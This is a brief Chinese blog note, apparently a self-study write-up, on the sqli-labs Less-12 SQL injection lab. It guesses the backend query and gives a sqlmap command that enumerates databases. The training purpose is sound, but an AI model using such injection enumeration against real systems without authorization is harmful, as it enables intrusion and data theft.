目录
类型
基于错误-字符串
通过回显可以看出比Less11加了括号
猜测sql语句
select * from users where username=("参数") and password=("参数") LIMIT 0,1
-dbs枚举数据库
python sqlmap.py -r "E:\Workspace\Burp_suite_workspace\less12" --dbms mysql -dbs
不使用--batch了,有些默认选项他选的不是很好,导致比较慢。
后面的我就不写了,和之前的文章网络安全-sqlmap实战之sqlilabs-Less11一样。不浪费时间了,去跑步了~~~
更多内容查看:网络安全-自学笔记
喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。